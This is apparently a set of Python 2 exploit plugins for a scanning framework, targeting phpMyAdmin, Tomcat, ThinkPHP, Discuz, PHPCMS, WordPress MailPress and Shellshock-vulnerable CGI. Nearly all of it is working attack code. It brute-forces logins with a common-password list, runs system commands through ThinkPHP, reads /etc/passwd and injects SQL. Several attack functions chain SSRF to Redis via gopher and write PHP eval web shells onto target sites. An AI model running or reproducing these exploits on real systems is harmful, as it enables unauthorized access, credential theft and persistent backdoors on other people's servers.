def _verify(self, verify=True): result = {} url_list = [self.url] flag_list = ['src=\"navigation.php', 'frameborder=\"0\" id=\"frame_content\"', 'id=\"li_server_type\">', 'class=\"disableAjax\" title='] if "phpmyadmin" not in self.url.lower(): url_list.append(self.url + "/phpmyadmin/index.php") username_list = ['admin', 'root', 'test'] password_list = ["", '123456789', 'a123456', '123456', 'a123456789', '1234567890', 'woaini1314', 'qwerasdf', 'abc123456', '123456a', '123456789a', '147258369', 'zxcvbnm', '987654321', 'qwer!@#$', 'abc123', '123456789.', '5201314520', 'q123456', '123456abc', '123123123', '123456.', '0123456789', 'asd123456', 'aa123456', 'q123456789', '!QAZ@WSX', '1qaz2wsx'] for url in url_list: try: f_res = req.get(url, timeout=5) if "pma_password" in f_res.content and 'phpMyAdmin' in f_res.content: for username in username_list: for password in password_list: payload = {'pma_username': username, 'pma_password': password} headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'} res = req.post(url, headers=headers, data=payload, timeout=5) for flag in flag_list: if flag in res.content and res.status_code == 200: result['VerifyInfo'] = {} result['VerifyInfo']['url'] = url result['VerifyInfo']['status_code'] = res.status_code result['VerifyInfo']['username'] = username result['VerifyInfo']['password'] = password result['username'] = username result['password'] = password return self.parse_attack(result) except Exception as e: raise e
def _verify(self): #定义返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url #获取处理后的url vul_url = self.host_port(vul_url) #定义poc路径和payload poc_path = urlparse.urljoin(vul_url, "test.txt") payload = "this is Vulnerable cve201712617!" #检测漏洞 try: #print urlparse.urljoin(vul_url,poc_name) poc_req = req.put(url=poc_path, data=payload, verify=False) #print poc_req.content poc_content = req.get(url=poc_path).content #print poc_content if 'cve201712617' in poc_content: #print u'\n【警告】' + vul_url + "【存在漏洞】" result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = poc_path result['VerifyInfo']['Payload'] = payload else: #print u'\n【不存在漏洞】 ' + vul_url pass except: # return vul_url pass print '[+]18 poc done' return self.save_output(result)
def _verify(self): # 调用指纹方法 result={} #如果设置端口则取端口,没有设置则为默认端口 import re import socket import time vul_url = "%s"%self.url # from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = int(url2ip(vul_url)[1]) else : _host = url2ip(vul_url) _port = 80 #判断端口是否开放 import socket sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sk.settimeout(1) try: sk.connect((_host,_port)) #print 'Server port is OK!' except Exception: return self.save_output(result) sk.close() vul_ip = "http://%s:%s/" % (_host, _port) payloads=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222", "index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222", "index.php?s=index/\\think\Request/input&filter=printf&data=ads3234asdg34ggasda222", "index.php?s=index/\\think\\view\driver\Php/display&content=<?php printf 'ads3234asdg34ggasda222';?>", "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=ads3234asdg34ggasda222"] payloads2=["index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls", "index.php?s=admin/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()", "index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir", "index.php?s=index/\\think\\view\driver\Php/display&content=<?php phpinfo();?>", "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()", "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls", "index.php?s=index/\\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir"] for p in payloads2: url=vul_ip+p try: text = req.get(url,timeout=4).text if ("index.php" in text and "robots.txt" in text) or ("Configuration File" in text): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_ip result['VerifyInfo']['Payload'] = p return self.save_output(result) except Exception as e: print e pass return self.save_output(result)
def _attack(self): result = {} payload = ('gopher://127.0.0.1:6379/' '_eval "local t=redis.call(\'keys\',\'*_setting\');' 'for i,v in ipairs(t) do redis.call(\'set\',v,' '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";' 'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";' 's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";' 'a:1:{s:7:\\\"plugins\\\";s:32:\\\"system(base64_decode($_GET[c]));\\\";}}}' 's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')' ' end;return 1;" 0 %250D%250Aquit') vul_url = self.url + payload req.get(vul_url) web_url = self.url.rpartition('/') while web_url[2] != urlparse.urlparse(self.url).netloc: shell_url = web_url[0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes' rep = req.get(shell_url) if rep.status_code == 200: # 该文件作为一句话的话payload会被拦截,且flush后shell会掉,所以用命令马向当前目录写入一句话 flag = ''.join([random.choice(string.digits) for _ in range(8)]) shell_flag = ''.join([random.choice(string.lowercase) for _ in range(8)]) shell_payload = 'echo \'<?php @eval($_POST[c]);echo "' + flag + '";?>\' > ' + shell_flag + '.php' shell_payload_b64 = base64.b64encode(shell_payload) req.get(shell_url + '&c=' + shell_payload_b64) shell_url = web_url[0] + '/' + shell_flag + '.php' rep = req.get(shell_url) if rep.status_code == 200 and flag in rep.content: result['ShellInfo'] = {} result['ShellInfo']['URL'] = shell_url result['ShellInfo']['Content'] = '@eval($_POST[c]);' # 验证后恢复,避免网站无法访问 payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit' recover_url = self.url + payload_flush req.get(recover_url) req.get(web_url[0] + '/forum.php') break web_url = web_url[0].rpartition('/') return self.parse_output(result)
def _attack(self): result = {} url_part = self.url.rpartition('/') payload = ('gopher://127.0.0.1:6379/xeval ' '"local t=redis.call(\'keys\',\'*_setting\');' 'for i,v in ipairs(t) do redis.call(\'set\',v,' '\'a:2:{s:6:\\"output\\";a:1:{s:4:\\"preg\\";' 'a:2:{s:6:\\"search\\";a:1:{s:7:\\"plugins\\";' 's:5:\\"/^./e\\";}s:7:\\"replace\\";a:1:{s:7:\\"plugins\\";' 's:40:\\"system(base64_decode($_GET[dshtanger]));\\";}}}' 's:13:\\"rewritestatus\\";a:1:{s:7:\\"plugins\\";i:1;}}\') end;' 'return 1;" 0 %250D%250Aquit') target_url = self.url + payload vul_rep = req.get(target_url) while vul_rep.status_code == 200: shell_url = url_part[0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes' shell_rep = req.get(shell_url) if shell_rep.status_code == 200: random_sed = string.letters+string.digits flag = ''.join([random.choice(random_sed) for _ in range(8)]) shell_flag = ''.join([random.choice(random_sed) for _ in range(8)]) #use system() write a shell php file and shell will retained after flushing redis apache shell_payload = 'echo \'<?php @eval($_POST[dshtanger]);echo "' + flag + '";?>\' > ' + shell_flag + '.php' shell_payload_b64 = base64.b64encode(shell_payload) #write a random php file req.get(shell_url + '&dshtanger=' + shell_payload_b64) #access this php file verify_url = url_part[0] + '/' + shell_flag + '.php' verify_rep = req.get(verify_url) if (verify_rep.status_code == 200) and ( flag in verify_rep.content): result['ShellInfo'] = {} result['ShellInfo']['URL'] = verify_url result['ShellInfo']['Content'] = '@eval($_POST[dshtanger]);' #recover website flush_payload = 'gopher://127.0.0.1:6379/xflushall%0D%0Aquit' flush_url = self.url + flush_payload req.get(flush_url) test_url = url_part[0] + '/forum.php' req.get(test_url) break return self.parse_output(result)
def _verify(self): result = {} vulurl = "%s/index.php?m=wap&c=index&a=comment_list&commentid=content_12" % self.url payload = "%2527%20or%20updatexml(1,concat(0x7e7e7e,version(),0x7e7e7e)),0)%23-84-1" resp = req.get(vulurl+payload) re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S|re.I) if re_result: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vulurl result['VerifyInfo']['Payload'] = payload return self.parse_output(result)
def _verify(self): result = {} header = { 'User-Agent': '() { :; }; echo; /bin/cat /etc/passwd' } res = req.get("%s/tarantella/cgi-bin/modules.cgi" % self.url, headers = header) if 'root:x:0:0:root:' in res.text: result['VerifyInfo'] = {} result['VerifyInfo']['Url'] = self.url result['VerifyInfo']['PostData'] = '() { :; }; echo; /bin/cat /etc/passwd' return self.parse_output(result)
def _attack(self): result = {} ssrf_url = "ssrf.php?ssrf=" #对应dz文件 payload = ('gopher://127.0.0.1:6379/'\ '_eval "local t=redis.call(\'keys\',\'*_setting\');'\ 'for i,v in ipairs(t) do redis.call(\'set\',v,'\ '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\ 'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\ 's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\ 'a:1:{s:7:\\\"plugins\\\";s:34:\\\"eval(base64_decode(\$_REQUEST[a]));\\\";}}}'\ 's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\ ' end;return 1;" 0 %250D%250Aquit') web_url = self.url.rpartition('/') self.url = web_url[0]+ '/' + web_url[2] + '/' vul_url = self.url + ssrf_url + payload base_rep = req.get(vul_url) web_url = self.url.rpartition('/') while base_rep.status_code == 200: shell_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes' rep = req.get(shell_url) if rep.status_code == 200: shell_payload = 'file_put_contents("shell.php","<?php @eval(\$_REQUEST[she1l]);?>");' shell_payload_b64 = base64.b64encode(shell_payload) attack_url= shell_url + '&a=' + shell_payload_b64 req.get(attack_url) flag = "phpinfo"; shell_url = web_url[0] + '/' + 'shell.php' verify_url = shell_url + "?she1l=phpinfo();" rep = req.get(verify_url) if rep.status_code == 200 and flag in rep.content: result['ShellInfo'] = {} result['ShellInfo']['URL'] = shell_url result['ShellInfo']['Content'] = '@eval($_REQUEST[she1l]);' #后台内存清理 payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit' recover_url = self.url + ssrf_url +payload_flush req.get(recover_url) req.get(web_url[0] + '/forum.php') break web_url = web_url[0].rpartition('/') return self.parse_output(result) return self.parse_output(result)
def resolve_js_redirects(url): meta_regx = '(?is)\<meta[^<>]*?url\s*=([\d\w://\\\\.?=&;%-]*)[^<>]*' body_regx = '''(?is)\<body[^<>]*?location[\s\.\w]*=['"]?([\d\w://\\\\.?=&;%-]*)['"]?[^<>]*''' js_regx = '''(?is)<script.*?>[^<>]*?window\.location\.(?:replace|href|assign)[\("']*([\d\w://\\\\.?=&;%-]*)[^<>]*?</script>''' if not url.startswith(('http://', 'https://')): url = 'http://' + url res = req.get(url) true_url = res.url for regx in [meta_regx, body_regx, js_regx]: result = re.search(regx, res.text) if result: true_url = result.group(1) break return true_url
def _verify(self): result = {} url_part = self.url.rpartition('/') random_sed = string.letters+string.digits flag = ''.join([random.choice(random_sed) for _ in xrange(10)]) payload = "/index.php?app=core&module=system&controller=content&do=find&content_class=cms\\Fields1{}echo%20" + "md5(" + flag + ");/*" target_url = self.url + payload target_rep = req.get(target_url) while target_rep.status_code == 200: flag_hash = hashlib.md5(flag).hexdigest() if flag_hash in target_rep.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = target_url break return self.parse_output(result)
def _verify(self): ### #!!!!The ssrf_url is one file i put it in discuz for test. #!!!!One day you find the real ssrf in discuz you can change the ssrf_url to work well; ### print self.url ssrf_url = "ssrf_gopher.php?ssrf=" result = {} #Write your code here payload = ('gopher://127.0.0.1:6379/'\ '_eval "local t=redis.call(\'keys\',\'*_setting\');'\ 'for i,v in ipairs(t) do redis.call(\'set\',v,'\ '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\ 'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\ 's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\ 'a:1:{s:7:\\\"plugins\\\";s:10:\\\"phpinfo();\\\";}}}'\ 's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\ ' end;return 1;" 0 %250D%250Aquit') tmpparse = urlparse.urlparse(self.url) if tmpparse.path != '': self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1] #self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' +(tmpparse.path.split('/')[1],tmpparse.path.split('/')[0])['/' in tmpparse.path] else: self.url = tmpparse.scheme + '://'+ tmpparse.netloc vul_url = self.url + '/' + ssrf_url + payload base_rep = req.get(vul_url) while base_rep.status_code == 200: verify_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes' rep = req.get(verify_url) flag = 'phpinfo'; if flag in rep.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = verify_url payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit' recover_url = self.url + '/' +ssrf_url + payload_flush req.get(recover_url) req.get(self.url + '/forum.php') break return self.parse_output(result)
def _attack(self): result = {} flag = ''.join([random.choice(string.digits) for _ in range(8)]) flag_hash = hashlib.md5(flag).hexdigest() exp_url = "wp-content/plugins/mailpress/mp-includes/action.php" post_data = { 'action':'autosave', 'id':'0', 'revision':'-1', 'to_list':'1', 'subject':'<?php echo md5('+flag+'); @eval($_REQUEST[shell]);?>', 'mail_format':'standard', 'autosave':'1' } tmpparse = urlparse.urlparse(self.url) if tmpparse.path != '': self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1] else: self.url = tmpparse.scheme + '://'+ tmpparse.netloc vul_url = self.url + '/' + exp_url base_rep = req.post(vul_url,data=post_data) getid = re.findall(r'<autosave id=\'[\d]*\'',base_rep.content,re.I) tmpid = getid[0].split("'")[1] while int(tmpid) > 0: shell_url = self.url + '/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id='+tmpid rep = req.get(shell_url) if flag_hash in rep.content: result['ShellInfo'] = {} result['ShellInfo']['URL'] = shell_url result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);' break return self.parse_output(result)
def _verify(self): result = {} #Write your code here flag = ''.join([random.choice(string.digits) for _ in range(8)]) payload = ('gopher://127.0.0.1:6379/' '_eval "local t=redis.call(\'keys\',\'*_setting\');' 'for i,v in ipairs(t) do redis.call(\'set\',v,' '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";' 'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";' 's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";' 'a:1:{s:7:\\\"plugins\\\";s:14:\\\"md5(' + flag + ');\\\";}}}' 's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')' ' end;return 1;" 0 %250D%250Aquit') vul_url = self.url + payload req.get(vul_url) web_url = self.url.rpartition('/') while web_url[2] != urlparse.urlparse(self.url).netloc: poc_url = web_url[0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes' rep = req.get(poc_url) flag_hash = hashlib.md5(flag).hexdigest() if flag_hash in rep.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = poc_url # 验证后恢复,避免网站无法访问 payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit' recover_url = self.url + payload_flush req.get(recover_url) req.get(web_url[0] + '/forum.php') break web_url = web_url[0].rpartition('/') return self.parse_output(result)
def _verify(self): ''' 本地搭建ssrf.php,验证PoC ''' ssrf_url = "ssrf.php?ssrf=" # result = {} payload = ('gopher://127.0.0.1:6379/'\ '_eval "local t=redis.call(\'keys\',\'*_setting\');'\ 'for i,v in ipairs(t) do redis.call(\'set\',v,'\ '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\ 'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\ 's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\ 'a:1:{s:7:\\\"plugins\\\";s:10:\\\"phpinfo();\\\";}}}'\ 's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\ ' end;return 1;" 0 %250D%250Aquit') web_url = self.url.rpartition('/') self.url = web_url[0]+ '/' + web_url[2] + '/' vul_url = self.url + ssrf_url + payload base_rep = req.get(vul_url) while base_rep.status_code == 200: verify_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes' rep = req.get(verify_url) flag = 'phpinfo'; if flag in rep.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = verify_url payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit' recover_url = self.url + ssrf_url + payload_flush req.get(recover_url) req.get(web_url[0] + '/forum.php') break web_url = web_url[0].rpartition('/') return self.parse_output(result)
def _verify(self): result = {} url_part = self.url.rpartition('/') #ssrf_url = "ssrf_gopher.php?ssrf=" random_sed = string.letters+string.digits flag = ''.join([random.choice(random_sed) for _ in xrange(16)]) payload = ('gopher://127.0.0.1:6379/xeval ' '"local t=redis.call(\'keys\',\'*_setting\');' 'for i,v in ipairs(t) do redis.call(\'set\',v,' '\'a:2:{s:6:\\"output\\";a:1:{s:4:\\"preg\\";' 'a:2:{s:6:\\"search\\";a:1:{s:7:\\"plugins\\";' 's:5:\\"/^./e\\";}s:7:\\"replace\\";a:1:{s:7:\\"plugins\\";' 's:22:\\"md5('+ flag +');\\";}}}' 's:13:\\"rewritestatus\\";a:1:{s:7:\\"plugins\\";i:1;}}\') end;' 'return 1;" 0 %250D%250Aquit') target_url = self.url + payload target_rep = req.get(target_url) while target_rep.status_code == 200 : poc_url = url_part[0] +'/forum.php?mod=ajax&inajax=yes&action=getthreadtypes' poc_rep = req.get(poc_url) flag_hash = hashlib.md5(flag).hexdigest() if flag_hash in poc_rep.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = poc_url #recover website flush_payload = 'gopher://127.0.0.1:6379/xflushall%0D%0Aquit' flush_url = self.url + flush_payload req.get(flush_url) test_url = url_part[0] + '/forum.php' req.get(test_url) break return self.parse_output(result)